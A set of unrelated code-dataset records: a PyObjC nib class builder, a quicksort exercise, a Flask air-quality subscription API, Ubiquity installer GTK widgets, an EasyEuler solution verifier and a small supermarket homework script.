writer.indent()\n writer.writeln('AppHelper.runEventLoop()')\n writer.dedent()\n\n def _printClass(self, writer, clsInfo):\n nibs = clsInfo.nibs\n if len(nibs) > 1:\n nibs[-2] = nibs[-2] + \" and \" + nibs[-1]\n del nibs[-1]\n nibs = \", \".join(nibs)\n writer.writeln(\"# class defined in %s\" % nibs)\n writer.writeln(\"class %s(NibClassBuilder.AutoBaseClass):\" % clsInfo.name)\n writer.indent()\n writer.writeln(\"# the actual base class is %s\" % clsInfo.super)\n outlets = clsInfo.outlets\n actions = clsInfo.actions\n if outlets:\n writer.writeln(\"# 
The following outlets are added to the class:\")\n outlets.sort()\n for o in outlets:\n writer.writeln(\"# %s\" % o)\n writer.writeln()\n if not actions:\n writer.writeln(\"pass\")\n writer.writeln()\n else:\n if actions:\n actions.sort()\n for a in actions:\n writer.writeln(\"def %s(self, sender):\" % a)\n writer.indent()\n writer.writeln(\"pass\")\n writer.dedent()\n writer.writeln()\n writer.writeln()\n writer.dedent()\n\n\ndef _frameworkForClass(className):\n \"\"\"Return the name of the framework containing the class.\"\"\"\n try:\n cls = objc.lookUpClass(className)\n except objc.error:\n return \"\"\n path = NSBundle.bundleForClass_(cls).bundlePath()\n if path == \"/System/Library/Frameworks/Foundation.framework\":\n return \"Foundation\"\n elif path == \"/System/Library/Frameworks/AppKit.framework\":\n return \"AppKit\"\n else:\n return \"\"\n\n\ndef _classExists(className):\n \"\"\"Return True if a class exists in the Obj-C runtime.\"\"\"\n try:\n objc.lookUpClass(className)\n except objc.error:\n return 0\n else:\n return 1\n\n\nclass IndentWriter:\n\n \"\"\"Simple helper class for generating (Python) code.\"\"\"\n\n def __init__(self, file=None, indentString=\" \"):\n if file is None:\n file = sys.stdout\n self.file = file\n self.indentString = indentString\n self.indentLevel = 0\n\n def writeln(self, line=\"\"):\n if line:\n self.file.write(self.indentLevel * self.indentString +\n line + \"\\n\")\n else:\n self.file.write(\"\\n\")\n\n def indent(self):\n self.indentLevel += 1\n\n def dedent(self):\n assert self.indentLevel > 0, \"negative dedent\"\n self.indentLevel -= 1\n\n\ndef mergeLists(l1, l2):\n r = {}\n for i in l1:\n r[i] = 1\n for i in l2:\n r[i] = 1\n return r.keys()\n\n\nclass _NibClassBuilder(type):\n\n def _newSubclass(cls, name, bases, methods):\n # Constructor for AutoBaseClass: create an actual\n # instance of _NibClassBuilder that can be subclassed\n # to invoke the magic behavior.\n return type.__new__(cls, name, bases, methods)\n _newSubclass = classmethod(_newSubclass)\n\n def __new__(cls, name, bases, methods):\n # __new__ would normally create a subclass of cls, but\n # instead we create a completely different class.\n if bases and bases[0].__class__ is cls:\n # get rid of the AutoBaseClass base class\n bases = bases[1:]\n return _nibInfo.makeClass(name, bases, methods)\n\n\n# AutoBaseClass is a class that has _NibClassBuilder is its' metaclass.\n# This means that if you subclass from AutoBaseClass, _NibClassBuilder\n# will be used to create the new \"subclass\". This will however _not_\n# be a real subclass of AutoBaseClass, but rather a subclass of the\n# Cocoa class specified in the nib.\nAutoBaseClass = _NibClassBuilder._newSubclass(\"AutoBaseClass\", (), {})\n\n\n_nibInfo = NibInfo()\n\nextractClasses = _nibInfo.extractClasses\n\n\n#\n# The rest of this file is a simple command line tool.\n#\n\ncommandline_doc = \"\"\"\\\nNibLoader.py [-th] nib1 [...nibN]\n Print an overview of the classes found in the nib file(s) specified,\n listing their superclass, actions and outlets as Python source. 
This\n output can be used as a template or a stub.\n -t Instead of printing the overview, perform a simple test on the\n arguments.\n -h Print this text.\"\"\"\n\ndef usage(msg, code):\n if msg:\n print(msg)\n print(commandline_doc)\n sys.exit(code)\n\ndef test(*nibFiles):\n for path in nibFiles:\n print(\"Loading %s\"%(path,))\n extractClasses(path=path)\n print\n classNames = _nibInfo.keys()\n classNames.sort()\n for className in classNames:\n try:\n # instantiate class, equivalent to\n # class <className>(AutoBaseClass):\n # pass\n cls = type(className.encode('ascii'), (AutoBaseClass,), {})\n except NibLoaderError as why:\n print(\"*** Failed class: %s; NibLoaderError: %s\" % (\n className, why[0]))\n else:\n print(\"Created class: %s, superclass: %s\" % (cls.__name__,\n cls.__bases__[0].__name__))\n\ndef printTemplate(*nibFiles):\n for path in nibFiles:\n extractClasses(path=path)\n _nibInfo.printTemplate()\n\ndef commandline():\n import getopt\n\n try:\n opts, nibFiles = getopt.getopt(sys.argv[1:], \"th\")\n except getopt.error as msg:\n usage(msg, 1)\n\n doTest = 0\n for opt, val in opts:\n if opt == \"-t\":\n doTest = 1\n elif opt == \"-h\":\n usage(\"\", 0)\n\n if not nibFiles:\n usage(\"No nib file specified.\", 1)\n\n if doTest:\n test(*nibFiles)\n else:\n printTemplate(*nibFiles)\n\n\nif __name__ == \"__main__\":\n commandline()\n","repo_name":"albertz/music-player","sub_path":"mac/pyobjc-framework-Cocoa/Lib/PyObjCTools/NibClassBuilder.py","file_name":"NibClassBuilder.py","file_ext":"py","file_size_in_byte":15217,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"81"} +{"seq_id":"4377915229","text":"def partition(arr,l,r):\r\n pivot=arr[l]\r\n i=l+1\r\n j =r\r\n while True:\r\n while i<=r and arr[i]<=pivot:\r\n i+=1\r\n while l<=j and arr[j]>pivot:\r\n j-=1\r\n if j>=i:\r\n arr[i],arr[j]=arr[j],arr[i]\r\n else:\r\n break\r\n arr[l],arr[j]=arr[j],arr[l]\r\n return j\r\n\r\ndef quicksort(arr,l,r):\r\n if l<r:\r\n pivot=partition(arr,l,r)\r\n quicksort(arr,l,pivot-1)\r\n quicksort(arr,pivot+1,r)\r\n\r\nn=list(map(int,input().split()))\r\nquicksort(n,0,len(n)-1)\r\nprint(n)","repo_name":"ssong915/hongik_3_1","sub_path":"PL/과제1/PL_B935277_hw1/hw1_2.py","file_name":"hw1_2.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30448860089","text":"from flask import jsonify, request, current_app\nfrom marshmallow import ValidationError\n\nfrom app import db\nfrom app.api import bp\nfrom app.api.errors import error_response, bad_request\nfrom app.api.schemas import new_sub_schema, edit_sub_schema\nfrom app.gios_api import GiosService\nfrom app.models import Subscription\n\n\n@bp.route('/', methods=['GET'])\ndef connection():\n return jsonify({'message': 'API is online!'}), 200\n\n\n@bp.route('/air-data', methods=['GET'])\ndef get_air_data(): # TODO: functional testy\n lat = request.args.get('lat', None)\n lon = request.args.get('lon', None)\n if not lat or not lon:\n return error_response(422, 'Lack required parameters (lat, lon).')\n else:\n return jsonify(GiosService.get_nearest_station_data(lat, lon)), 200\n\n\n@bp.route('/register', methods=['POST'])\ndef register():\n \"\"\"\n {\n \"email\": \"sample@test.pl\",\n \"lat\": 51.1234,\n \"lon\": 21.0101,\n \"hours\": [12, 14, 20]\n }\n \"\"\"\n json_data = request.get_json()\n if not json_data:\n return bad_request('No input data provided')\n try:\n data = new_sub_schema.load(json_data)\n 
except ValidationError as e:\n return jsonify(e.messages), 422\n else:\n current_app.logger.info('Subscription data: %s' % data)\n\n # sprawdzić czy email już istnieje\n old_sub = Subscription.query.filter_by(email=data.get('email')).first()\n if old_sub is not None:\n current_app.logger.info(\"Email taken\")\n return error_response(422, \"Email '%s' already registered!\" % data.get('email'))\n\n hours = data.pop('hours')\n sub = Subscription(**data)\n sub.update_hours(hours)\n\n db.session.add(sub)\n db.session.commit()\n current_app.logger.info(\"Subscription saved\")\n return jsonify({'message': 'Subscription saved!'}), 200\n\n\n@bp.route('/subscription/<token>', methods=['GET', 'PUT', 'DELETE'])\ndef manage_subscription(token):\n subscription = Subscription.verify_change_subscription_token(token)\n if not subscription:\n return error_response(404, \"Token not recognized\")\n else:\n current_app.logger.info('Manage: %s' % subscription)\n\n # usunięcie subskrypcji\n if request.method == 'DELETE':\n db.session.delete(subscription)\n db.session.commit()\n current_app.logger.info('Subscription deleted')\n return jsonify({'message': 'Subscription deleted'}), 200\n\n # aktualizacja subskrypcji\n elif request.method == \"PUT\":\n json_data = request.get_json()\n if not json_data:\n return bad_request('No input data provided')\n try:\n data = edit_sub_schema.load(json_data)\n except ValidationError as e:\n return jsonify(e.messages), 422\n else:\n current_app.logger.info('Update subscription data: %s' % data)\n subscription.update_hours(data.pop('hours'))\n for key, value in data.items():\n subscription.__setattr__(key, value)\n\n db.session.add(subscription)\n db.session.commit()\n current_app.logger.info('Subscription updated')\n\n return jsonify({'message': 'Subscription updated'}), 200\n\n # pobierz dane subskrypcji\n elif request.method == \"GET\":\n result = new_sub_schema.dump(subscription)\n return result, 200\n\n\n@current_app.after_request\ndef after_request(response):\n current_app.logger.info('%s %s %s %s %s', request.remote_addr, request.method, request.scheme, request.full_path,\n response.status)\n return response\n","repo_name":"pgarr/smog-backend","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15256485125","text":"#!/usr/bin/python\n\nfrom gi.repository import Gtk, Gdk, GObject, Pango\nfrom gi.repository import UbiquityWebcam, GdkPixbuf\nfrom ubiquity import misc\nimport cairo, os\n\ndef draw_round_rect(c, r, x, y, w, h):\n c.move_to(x+r,y)\n c.line_to(x+w-r,y); c.curve_to(x+w,y,x+w,y,x+w,y+r)\n c.line_to(x+w,y+h-r); c.curve_to(x+w,y+h,x+w,y+h,x+w-r,y+h)\n c.line_to(x+r,y+h); c.curve_to(x,y+h,x,y+h,x,y+h-r)\n c.line_to(x,y+r); c.curve_to(x,y,x,y,x+r,y)\n c.close_path()\n\ndef gtk_to_cairo_color(c):\n color = Gdk.color_parse(c)\n s = 1.0/65535.0\n r = color.red * s\n g = color.green * s\n b = color.blue * s\n return r, g, b\n\nclass StylizedFrame(Gtk.Alignment):\n __gtype_name__ = 'StylizedFrame'\n __gproperties__ = {\n 'radius': (GObject.TYPE_INT, 'Radius',\n 'The radius of the rounded corners.', 0,\n GObject.constants.G_MAXINT, 10, GObject.PARAM_READWRITE),\n 'width' : (GObject.TYPE_INT, 'Width', 'The width of the outline.',\n 0, GObject.constants.G_MAXINT, 1,\n GObject.PARAM_READWRITE),\n }\n \n def __init__(self):\n Gtk.Alignment.__init__(self)\n self.radius = 10\n self.width = 1\n\n def do_get_property(self, prop):\n 
if prop.name in ('radius', 'width'):\n return getattr(self, prop.name)\n else:\n return Gtk.Alignment.do_get_property(self, prop)\n\n def do_set_property(self, prop, value):\n if prop.name in ('radius', 'width'):\n setattr(self, prop.name, value)\n self.queue_draw()\n else:\n Gtk.Alignment.do_set_property(self, prop, value)\n\n def paint_background(self, c):\n c.set_source_rgb(*gtk_to_cairo_color('#fbfbfb'))\n alloc = self.get_allocation()\n draw_round_rect(c, self.radius,\n self.width / 2, self.width / 2,\n alloc.width - self.width,\n alloc.height - self.width)\n c.fill_preserve()\n\n def do_draw(self, c):\n # Background\n self.paint_background(c)\n # Edge\n c.set_source_rgb(*gtk_to_cairo_color('#c7c7c6'))\n c.set_line_width(self.width)\n c.stroke()\n if self.get_child():\n top, bottom, left, right = self.get_padding()\n c.translate(left, top)\n self.get_child().draw(c)\n\nGObject.type_register(StylizedFrame)\n\nclass ResizeWidget(Gtk.HPaned):\n __gtype_name__ = 'ResizeWidget'\n __gproperties__ = {\n 'part_size' : (GObject.TYPE_UINT64, 'Partition size',\n 'The size of the partition being resized', 1,\n GObject.constants.G_MAXUINT64, 100,\n GObject.PARAM_READWRITE),\n 'min_size' : (GObject.TYPE_UINT64, 'Minimum size',\n 'The minimum size that the existing partition can ' \\\n 'be resized to', 0, GObject.constants.G_MAXUINT64, 0,\n GObject.PARAM_READWRITE),\n 'max_size' : (GObject.TYPE_UINT64, 'Maximum size',\n 'The maximum size that the existing partition can ' \\\n 'be resized to', 1, GObject.constants.G_MAXUINT64,\n 100, GObject.PARAM_READWRITE)\n }\n \n def do_get_property(self, prop):\n return getattr(self, prop.name.replace('-', '_'))\n\n def do_set_property(self, prop, value):\n setattr(self, prop.name.replace('-', '_'), value)\n\n def __init__(self, part_size=100, min_size=0, max_size=100,\n existing_part=None, new_part=None):\n Gtk.HPaned.__init__(self)\n assert min_size <= max_size <= part_size\n assert part_size > 0\n # The size (b) of the existing partition.\n self.part_size = part_size\n # The min size (b) that the existing partition can be resized to.\n self.min_size = min_size\n # The max size (b) that the existing partition can be resized to.\n self.max_size = max_size\n\n # FIXME: Why do we still need these event boxes to get proper bounds\n # for the linear gradient?\n self.existing_part = existing_part or PartitionBox()\n eb = Gtk.EventBox()\n eb.add(self.existing_part)\n self.pack1(eb, resize=False, shrink=False)\n self.new_part = new_part or PartitionBox()\n eb = Gtk.EventBox()\n eb.add(self.new_part)\n self.pack2(eb, resize=False, shrink=False)\n self.show_all()\n # FIXME hideous, but do_realize fails inexplicably.\n self.connect('realize', self.realize)\n\n def realize(self, w):\n # TEST: Make sure the value of the minimum size and maximum size\n # equal the value of the widget when pushed to the min/max.\n total = (self.new_part.get_allocation().width +\n self.existing_part.get_allocation().width)\n tmp = float(self.min_size) / self.part_size\n pixels = int(tmp * total)\n self.existing_part.set_size_request(pixels, -1)\n\n tmp = ((float(self.part_size) - self.max_size) / self.part_size)\n pixels = int(tmp * total)\n self.new_part.set_size_request(pixels, -1)\n\n def do_draw(self, cr):\n s1 = self.existing_part.get_allocation().width\n s2 = self.new_part.get_allocation().width\n total = s1 + s2\n\n percent = (float(s1) / float(total))\n self.existing_part.set_size(percent * self.part_size)\n percent = (float(s2) / float(total))\n self.new_part.set_size(percent * 
self.part_size)\n\n def set_pref_size(self, size):\n s1 = self.existing_part.get_allocation().width\n s2 = self.new_part.get_allocation().width\n total = s1 + s2\n\n percent = (float(size) / float(self.part_size))\n val = percent * total\n self.set_position(int(val))\n\n def get_size(self):\n '''Returns the size of the old partition,\n clipped to the minimum and maximum sizes.\n '''\n s1 = self.existing_part.get_allocation().width\n s2 = self.new_part.get_allocation().width\n totalwidth = s1 + s2\n size = int(float(s1) * self.part_size / float(totalwidth))\n if size < self.min_size:\n return self.min_size\n elif size > self.max_size:\n return self.max_size\n else:\n return size\n\n\nGObject.type_register(ResizeWidget)\n\nclass DiskBox(Gtk.HBox):\n __gtype_name__ = 'DiskBox'\n\n def add(self, partition, size):\n Gtk.HBox.add(self, partition, expand=False)\n partition.set_size_request(size, -1)\n\n def clear(self):\n self.forall(lambda x: self.remove(x))\n\nGObject.type_register(DiskBox)\n\nclass PartitionBox(StylizedFrame):\n __gtype_name__ = 'PartitionBox'\n __gproperties__ = {\n 'title' : (GObject.TYPE_STRING, 'Title', None, 'Title',\n GObject.PARAM_READWRITE),\n 'icon-name' : (GObject.TYPE_STRING, 'Icon Name', None,\n 'distributor-logo', GObject.PARAM_READWRITE),\n 'extra' : (GObject.TYPE_STRING, 'Extra Text', None, '',\n GObject.PARAM_READWRITE),\n }\n \n def do_get_property(self, prop):\n if prop.name == 'title':\n return self.ostitle.get_text()\n elif prop.name == 'icon-name':\n return self.logo.get_icon_name()\n elif prop.name == 'extra':\n return self.extra.get_text()\n return getattr(self, prop.name)\n\n def do_set_property(self, prop, value):\n if prop.name == 'title':\n self.ostitle.set_markup('<b>%s</b>' % value)\n return\n elif prop.name == 'icon-name':\n self.logo.set_from_icon_name(value, Gtk.IconSize.DIALOG)\n return\n elif prop.name == 'extra':\n self.extra.set_markup('<small>%s</small>' %\n (value and value or ' '))\n return\n setattr(self, prop.name, value)\n\n def __init__(self, title='', extra='', icon_name='distributor-logo'):\n # 10 px above the topmost element\n # 6 px between the icon and the title\n # 4 px between the title and the extra heading\n # 5 px between the extra heading and the size\n # 12 px below the bottom-most element\n StylizedFrame.__init__(self)\n vbox = Gtk.VBox()\n self.logo = Gtk.Image.new_from_icon_name(icon_name,\n Gtk.IconSize.DIALOG)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(10, 0, 0, 0)\n align.add(self.logo)\n vbox.pack_start(align, False, True, 0)\n\n self.ostitle = Gtk.Label()\n self.ostitle.set_ellipsize(Pango.EllipsizeMode.END)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(6, 0, 0, 0)\n align.add(self.ostitle)\n vbox.pack_start(align, False, True, 0)\n\n self.extra = Gtk.Label()\n self.extra.set_ellipsize(Pango.EllipsizeMode.END)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(4, 0, 0, 0)\n align.add(self.extra)\n vbox.pack_start(align, False, True, 0)\n\n self.size = Gtk.Label()\n self.size.set_ellipsize(Pango.EllipsizeMode.END)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(5, 12, 0, 0)\n align.add(self.size)\n vbox.pack_start(align, False, True, 0)\n self.add(vbox)\n\n self.ostitle.set_markup('<b>%s</b>' % title)\n # Take up the space that would otherwise be used to create symmetry.\n self.extra.set_markup('<small>%s</small>' % extra and extra or ' ')\n self.show_all()\n\n def set_size(self, size):\n size = misc.format_size(size)\n 
self.size.set_markup('<span size=\"x-large\">%s</span>' % size)\n\n def render_dots(self):\n # FIXME: Dots are rendered over the frame.\n s = cairo.ImageSurface(cairo.FORMAT_ARGB32, 2, 2)\n cr = cairo.Context(s)\n cr.set_source_rgb(*gtk_to_cairo_color('#b6b0a9'))\n cr.rectangle(1, 1, 1, 1)\n cr.fill()\n pattern = cairo.SurfacePattern(s)\n return pattern\n\n def paint_background(self, c):\n StylizedFrame.paint_background(self, c)\n a = self.get_allocation()\n pattern = self.render_dots()\n pattern.set_extend(cairo.EXTEND_REPEAT)\n c.set_source(pattern)\n c.fill_preserve()\n\n g = cairo.RadialGradient(a.width / 2, a.height / 2, 0, a.width / 2,\n a.height / 2,\n a.width > a.height and a.width or a.height)\n g.add_color_stop_rgba(0.00, 1, 1, 1, 1.00)\n g.add_color_stop_rgba(0.25, 1, 1, 1, 0.75)\n g.add_color_stop_rgba(0.40, 1, 1, 1, 0.00)\n c.set_source(g)\n c.fill_preserve()\n\nGObject.type_register(PartitionBox)\n\nclass StateBox(StylizedFrame):\n __gtype_name__ = 'StateBox'\n __gproperties__ = {\n 'label' : (GObject.TYPE_STRING, 'Label', None, 'label',\n GObject.PARAM_READWRITE),\n }\n \n def do_get_property(self, prop):\n if prop.name == 'label':\n return self.label.get_text()\n return getattr(self, prop.name)\n\n def do_set_property(self, prop, value):\n if prop.name == 'label':\n self.label.set_text(value)\n return\n setattr(self, prop.name, value)\n \n def __init__(self, text=''):\n StylizedFrame.__init__(self)\n alignment = Gtk.Alignment()\n alignment.set_padding(7, 7, 15, 15)\n hbox = Gtk.HBox()\n hbox.set_spacing(10)\n self.image = Gtk.Image()\n self.image.set_from_stock(Gtk.STOCK_YES, Gtk.IconSize.LARGE_TOOLBAR)\n self.label = Gtk.Label(label=text)\n \n self.label.set_alignment(0, 0.5)\n hbox.pack_start(self.image, False, True, 0)\n hbox.pack_start(self.label, True, True, 0)\n alignment.add(hbox)\n self.add(alignment)\n self.show_all()\n\n self.status = True\n\n def set_state(self, state):\n self.status = state\n if state:\n self.image.set_from_stock(Gtk.STOCK_YES,\n Gtk.IconSize.LARGE_TOOLBAR)\n else:\n self.image.set_from_stock(Gtk.STOCK_NO,\n Gtk.IconSize.LARGE_TOOLBAR)\n\n def get_state(self):\n return self.status\n\nGObject.type_register(StateBox)\n\nFACES_PATH = '/usr/share/pixmaps/faces'\n\nclass FaceSelector(Gtk.VBox):\n __gtype_name__ = 'FaceSelector'\n def __init__(self):\n Gtk.VBox.__init__(self)\n self.set_spacing(12)\n\n vb_left = Gtk.VBox.new(False, 3)\n # TODO i18n\n l = Gtk.Label('Take a photo:')\n vb_left.pack_start(l, False, False, 0)\n f = Gtk.Frame()\n self.webcam = UbiquityWebcam.Webcam()\n self.webcam.connect('image-captured', self.image_captured)\n f.add(self.webcam)\n vb_left.add(f)\n\n vb_right = Gtk.VBox.new(False, 3)\n # TODO i18n\n l = Gtk.Label('Or choose an existing picture:')\n vb_right.pack_start(l, False, False, 0)\n iv = Gtk.IconView()\n iv.connect('selection-changed', self.selection_changed)\n sw = Gtk.ScrolledWindow()\n sw.set_shadow_type(Gtk.ShadowType.IN)\n sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)\n sw.add(iv)\n vb_right.add(sw)\n\n hb = Gtk.HBox.new(True, 30)\n hb.add(vb_left)\n hb.add(vb_right)\n self.add(hb)\n\n self.selected_image = Gtk.Image()\n self.selected_image.set_size_request(96, 96)\n self.add(self.selected_image)\n\n m = Gtk.ListStore(GObject.type_from_name('GdkPixbuf'))\n iv.set_model(m)\n iv.set_pixbuf_column(0)\n if os.path.exists(FACES_PATH):\n for path in os.listdir(FACES_PATH):\n pb = GdkPixbuf.Pixbuf.new_from_file(\n os.path.join(FACES_PATH, path))\n m.append([pb])\n\n def webcam_play(self):\n 
self.webcam.play()\n\n def webcam_stop(self):\n self.webcam.stop()\n\n def save_to(self, path):\n pb = self.selected_image.get_pixbuf()\n if not pb:\n return False\n\n d = os.path.dirname(path)\n with misc.raised_privileges():\n if not os.path.exists(d):\n os.makedirs(d)\n pb.savev(path, 'png', [], [])\n\n def image_captured(self, unused, path):\n pb = GdkPixbuf.Pixbuf.new_from_file_at_size(path, 96, 96);\n self.selected_image.set_from_pixbuf(pb)\n\n def selection_changed(self, iv):\n selection = iv.get_selected_items()\n if not selection:\n return\n selection = selection[0]\n m = iv.get_model()\n self.selected_image.set_from_pixbuf(m[selection][0])\n\nGObject.type_register(FaceSelector)\n\n","repo_name":"Alberto-Beralix/Beralix","sub_path":"i386-squashfs-root/usr/lib/ubiquity/ubiquity/gtkwidgets.py","file_name":"gtkwidgets.py","file_ext":"py","file_size_in_byte":14874,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"33743582759","text":"import math\nimport os\nimport re\nimport subprocess\nimport sys\nimport time\n\nimport click\n\nfrom EasyEuler import data\nfrom EasyEuler.types import LanguageType\n\n\nPROBLEM_ID_REGEX = re.compile(r'\\D*([1-9]\\d{0,2}).*')\nSTAGES = ('build', 'execute', 'cleanup')\n\n\n@click.command()\n@click.option('--time', '-t', is_flag=True,\n help='Time the execution of files.')\n@click.option('--errors', '-e', is_flag=True,\n help='Show errors.')\n@click.option('--recursive', '-r', is_flag=True,\n help='Verify files in specified directory paths.')\n@click.option('--language', '-l', type=LanguageType(),\n help='The language of the file(s).')\n@click.argument('paths', type=click.Path(exists=True, readable=True), nargs=-1,\n metavar='[PATH]...')\ndef cli(paths, language, time, errors, recursive):\n \"\"\"\n Verify the solution to a problem.\n\n Runs the appropriate command for a language (specified in the\n configuration file) with the file path(s) as arguments.\n\n If the LANGUAGE option isn't specified, it will be identified based\n on the file extension. 
Similarly, the problem ID will be identified\n based on the file name.\n\n \"\"\"\n\n for path in paths:\n if os.path.isdir(path):\n if recursive:\n validate_directory(path, language, time, errors)\n else:\n click.echo('Skipping %s because it is a directory '\n 'and --recursive was not specified' %\n click.format_filename(path))\n else:\n validate_file(path, language, time, errors)\n\n\ndef validate_directory(path, language, time_execution, show_errors):\n for root, _, filenames in os.walk(path):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n validate_file(file_path, language, time_execution, show_errors)\n\n\ndef validate_file(path, language, time_execution, show_errors):\n problem = get_problem_from_path(path)\n if problem is None:\n click.echo('Skipping %s because it does not contain '\n 'a valid problem ID' % click.format_filename(path))\n return\n\n if language is None:\n language = get_language_from_path(path) or {}\n\n click.echo('Checking output of %s: ' % click.format_filename(path),\n nl=False)\n result = verify_solution(path, language, time_execution, problem)\n print_result(result, show_errors, time_execution)\n\n\ndef print_result(result, show_errors, show_time):\n if result['error'] != 'none':\n if show_errors:\n error_message = result[result['error']]['output']\n else:\n error_message = '[error during %s]' % result['error']\n click.secho('\\n%s' % error_message, fg='red')\n return\n\n click.secho(result['execute']['output'] or '[no output]',\n fg='green' if result['correct'] else 'red')\n\n if show_time:\n print_execution_time(result['execute']['execution_time'])\n\n\ndef print_execution_time(execution_time):\n if 'user' in execution_time:\n execution_time_msg = 'CPU times - user: {user}, ' \\\n 'system: {system}, total: {total}\\n' \\\n 'Wall time: {wall}\\n'\n else:\n execution_time_msg = 'Time: {wall}\\n'\n click.secho(execution_time_msg.format(**execution_time), fg='cyan')\n\n\ndef get_problem_from_path(path):\n problem_id = get_problem_id_from_path(path)\n if problem_id is None:\n return None\n return data.problems.get(problem_id)\n\n\ndef get_language_from_path(path):\n file_extension = os.path.splitext(path)[1].replace('.', '')\n return data.config.get_language('extension', file_extension)\n\n\ndef get_problem_id_from_path(path):\n problem_id = PROBLEM_ID_REGEX.findall(path)\n return int(problem_id[0]) if len(problem_id) > 0 else None\n\n\ndef verify_solution(path, language, time_execution, problem):\n commands = get_commands(path, language)\n result = {'error': 'none'}\n\n for stage in STAGES:\n if commands[stage] is None:\n continue\n\n if stage == 'execute':\n result[stage] = execute_process(commands[stage], time_execution)\n result['correct'] = result[stage]['output'] == problem['answer']\n else:\n result[stage] = execute_process(commands[stage], False)\n\n if result[stage]['error']:\n result['error'] = stage\n break\n\n return result\n\n\ndef get_process_output(process):\n if process.returncode != 0:\n return str(process.stderr, encoding='UTF-8'), True\n return str(process.stdout, encoding='UTF-8').rstrip(), False\n\n\ndef get_commands(path, language):\n commands = {'build': None, 'cleanup': None}\n commands['execute'] = language.get('execute', './{path}').format(path=path)\n\n if 'build' in language:\n commands['build'] = language['build'].format(path=path)\n if 'cleanup' in language:\n commands['cleanup'] = language['cleanup'].format(path=path)\n\n return commands\n\n\ndef execute_process(command, time_execution):\n if 
time_execution:\n start_time = get_time()\n process = subprocess.run(command, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n end_time = get_time()\n\n execution_time = {key: format_time(end_time[key] - start_time[key])\n for key in end_time}\n else:\n process = subprocess.run(command, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n execution_time = None\n\n output, error = get_process_output(process)\n return {'output': output, 'error': error, 'execution_time': execution_time}\n\n\ntry:\n import resource\n\n def get_time():\n rs = resource.getrusage(resource.RUSAGE_CHILDREN)\n return {'user': rs.ru_utime, 'system': rs.ru_stime,\n 'total': rs.ru_stime + rs.ru_utime, 'wall': time.time()}\nexcept ImportError:\n # The resource module only exists on Unix-based platforms.\n # This is a different platform, so we can't provide user\n # and system times.\n def get_time():\n return {'wall': time.time()}\n\n\ndef format_long_time(timespan):\n \"\"\"\n Formats a long timespan in a human-readable form with a\n precision of a 100th of a second.\n\n \"\"\"\n\n formatted_time = []\n units = (('d', 24 * 60 * 60), ('h', 60 * 60), ('m', 60), ('s', 1))\n\n for unit, length in units:\n value = int(timespan / length)\n\n if value > 0:\n timespan %= length\n formatted_time.append('%i%s' % (value, unit))\n\n if timespan < 1:\n break\n\n return ' '.join(formatted_time)\n\n\ndef format_short_time(timespan):\n \"\"\"\n Formats a short timespan in a human-readable form with a\n precision of a billionth of a second.\n\n \"\"\"\n\n scaling = (1, 1e3, 1e6, 1e9)\n units = ['s', 'ms', 'us', 'ns']\n\n # Attempt to change 'u' to the micro symbol if it's supported.\n if hasattr(sys.stdout, 'encoding') and sys.stdout.encoding:\n try:\n '\\xb5'.encode(sys.stdout.encoding)\n units[2] = '\\xb5s'\n except UnicodeEncodeError:\n pass\n\n if timespan > 0:\n order = min(-int(math.floor(math.log10(timespan)) // 3), 3)\n else:\n order = 3\n\n return '%.*g%s' % (3, timespan * scaling[order], units[order])\n\n\ndef format_time(timespan):\n \"\"\"\n Formats a timespan in a human-readable form.\n Courtesy of IPython.\n\n \"\"\"\n\n if timespan >= 60:\n # If the time is greater than one minute,\n # precision is reduced to a 100th of a second.\n return format_long_time(timespan)\n return format_short_time(timespan)\n","repo_name":"jfblomgren/EasyEuler","sub_path":"EasyEuler/commands/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":7734,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"81"} +{"seq_id":"25036553102","text":"# cs435 2018 spring section 002\n# created by Jae Young Choi\n# homework 1 part b\n# january 30th 2018\n\nimport product\n\nitem1 = product.Product('001', '1 head of lettuce')\nitem2 = product.Product('002', '1 lb of tomatoes')\nitem3 = product.Product('003', '16 oz loaf of bread')\n\nsupermarket = [item1, item2, item3]\n\nitem1.setPrice(1.49)\nitem2.setPrice(1.99)\nitem3.setPrice(0.00)\n\nbasket = ['001', '002', '003', '999']\n\nfor i in supermarket:\n i.printInformation()\n print()\n\nprice = 0\ndef checkout(supermarket, basket):\n for x in supermarket:\n if x.outOfStock() == True:\n print(x.code, 'is out of stock.')\n \n for x in basket:\n if x != item1.code and x != item2.code and x != item3.code:\n print(x, 'is an unidentifiable product.')\n \n for x in supermarket:\n global price\n price += x.dollarAmount\n \ncheckout(supermarket, basket)\nprint(price)\n 
